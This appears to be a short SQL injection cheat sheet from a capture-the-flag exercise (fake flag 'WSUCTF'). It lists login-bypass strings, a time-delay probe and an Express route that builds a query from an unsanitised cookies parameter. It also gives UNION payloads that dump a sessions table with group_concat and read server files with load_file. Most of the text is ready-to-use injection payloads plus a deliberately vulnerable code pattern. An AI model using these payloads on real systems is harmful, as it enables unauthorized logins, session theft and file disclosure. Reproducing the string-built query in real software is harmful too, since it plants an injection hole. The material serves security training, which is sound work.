SQL Cheat

Bypass Login

admin' --
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'/*
admin') or ('1'='1
' waitfor delay '0:0:20' --

WAF

Using / at username, and password as state above.

SQL in App (Not DB)

Sessions Cookies

app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
  cookies = req.query.cookies;

  const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;

    pool.query(query, (err, result) => {
      if(err){
        return next(err)
      }

    return res.status(200).render("index", {cookies: result || []})
    });
})

try {
    const adminCookieData = {"cookie":{"originalMaxAge":86400000,"expires":"2024-04-20T19:21:29.400Z","httpOnly":true,"path":"/", "sameSite": "lax"},"username":"Admin","isAdmin":true};
    const sessionId = 'WSUCTF{F4ke_Flag}';
    const expirationTimestamp = 1712172179;

    const serializedData = JSON.stringify(adminCookieData);

    const query = `INSERT INTO sessions (session_id, data, expires) VALUES (?, ?, ?)`;

The above code shows SQL Injection at /searchcookie where the cookies parameter is directly inserted into the query. The flag being stored in another tables name as sessions.

" union select 1,(select group_concat(session_id) from sessions),3-- -

Using group_concat to read all data in specific tables.

App/File

Utilize load_file() function to read files.

" union select 1,load_file('/app/src/app.js'),3-- -